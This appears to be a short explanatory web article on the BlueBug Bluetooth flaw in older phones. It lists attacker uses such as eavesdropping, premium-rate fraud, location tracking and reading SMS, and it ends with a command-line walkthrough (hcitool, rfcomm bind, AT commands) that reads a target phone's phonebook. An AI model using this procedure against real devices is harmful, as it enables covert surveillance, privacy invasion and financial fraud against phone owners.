BlueBug-Bluetooth Loophole
BlueBug is the name of a bluetooth security loophole on some bluetooth-enabled cell phones.This loophole can be used to attack a bluetooth enabled mobile and the attacker can send messages,download phone books and call list and many more things.
Phone Calls
As mentioned above, the BlueBug security loophole allows the attacker to initiate phone calls from the victim's device. Things that can be done with initiating phone calls include:
- eavesdropping
when the victim passes, a phone that is owned by the attacker (e.g. an anonimously used prepaid-card phone) is called. From this moment on, the attacker is able to listen to all the conversations that the victim does until the victim hangs up the phone
- causing financial damage
since phone calls to any number can be established, it is also possible to call premium service numbers from the victim's device. If the victim does not realize that a phone call is connected to a premium service number, this would cause severe financial damage to the victim.
SMS
Sending SMS from the victim's device can be used for quite a lot of things:
- finding out the victim's phone number
The phone number of the respective device is not storedd at a predefined location. The devive's number can be gained by sending an SMS from the victim's device to a phone that is owned by the attacker.
- causing financial damage
There are quite a lot of SMS-based services that cost the client about 3 Euros per SMS. Usually, these services are used to sell ringtones and logos. There are also news subscriptions that can be ordered by SMS that continously cause costs to the victim.
- tracking the victim
As a location-based service, some providers allow other users to locate their customers by the GSM global cell id which their phone is connected to. According to the the mode the respective GSM cells are configured, this information can be very detailed. In order to do this, the provider must get the permission from the customer. This permission is usually given via SMS (which is sent by the attacker).
- revealing secrets
Often SMS messages are used to silently communicate secret information with other people. Reading SMS of the attacked device is often touching the victim's privacy. Paparazzi could use this attack in order to find out more about certain celebrities.
BlueBug example
#scan for bluetooth devices:
oscar@darkside $ hcitool scan
Scanning...
00:0E:6D:10:1D:B6 Nokia 6310i
00:05:7A:01:A3:80 Airbus A380
00:06:6E:21:69:C2 Bluespoon AX
00:0F:DE:6C:61:04 T610
#bind channel 17 of target device to /dev/rfcomm42:
oscar@darkside $ rfcomm bind 42 00:0E:6D:10:1D:B6 17
#connect to AT terminal via, for example, cu:
oscar@darkside $ cu -l /dev/rfcomm42
Connected.
AT+CPBS="ME"
OK
AT+CPBR=1
+CPBR:1,"",,"ParisHilton"
OK
~.
Disconnected.